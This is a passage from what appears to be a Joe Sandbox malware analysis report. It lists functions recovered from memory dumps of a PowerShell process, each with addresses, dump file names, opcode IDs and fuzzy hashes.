                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF411833B0CA990FEBE9DA5C55612B9B3D2EF84390B5911BAD54ED3183EE19EC019381
                                                                                                                                                                                                                                    Function 00007FFD33053945 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000051.00000002.2341184128.00007FFD33050000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33050000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_81_2_7ffd33050000_powershell.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                    • Instruction ID: a9828f084e174248c858f820ae118333bf3a76b3179365d8430d37ee223451ce
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3401677121CB0C4FDB44EF4CE451AA5B7E0FB95364F10056DE58AC3651D736E881CB45
                                                                                                                                                                                                                                    Function 00007FFD33120970 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000051.00000002.2341691656.00007FFD33120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33120000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_81_2_7ffd33120000_powershell.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: a45b11031a15182859334822a46c5daa9876727c5ecf818cf396754b8d2f7bfb
                                                                                                                                                                                                                                    • Instruction ID: 6b3a94e74fd0711ddd151d6d4947119aa04245e618c5817dc14295d52e4c1c05
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a45b11031a15182859334822a46c5daa9876727c5ecf818cf396754b8d2f7bfb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2012663F0FADA0EFBA2A66918751A46AC0EF462A4B0801FAC54DE7093DC0C5C008341

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Function 00007FFD33055300 Relevance: 16.5, Strings: 13, Instructions: 238COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000051.00000002.2341184128.00007FFD33050000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33050000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_81_2_7ffd33050000_powershell.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Y-3$0I-3$0Y-3$@Y-3$HZ-3$PY-3$XZ-3$^$hZ-3$xF-3$xZ-3$x]-3$F-3
                                                                                                                                                                                                                                    • API String ID: 0-2808653681
                                                                                                                                                                                                                                    • Opcode ID: e0fa8899a94fc297424ec3f8457728ad20fb418e69a36c96bdb531e16624b7e8
                                                                                                                                                                                                                                    • Instruction ID: 51a25b9b283401172db6a556733202dda2d291309a4ca66082319fcc773925ab
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e0fa8899a94fc297424ec3f8457728ad20fb418e69a36c96bdb531e16624b7e8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6151E983B0FAD10BF35549DC7C252A99B90EF9126271801F7E2DDC61DBAC84AC4A63C5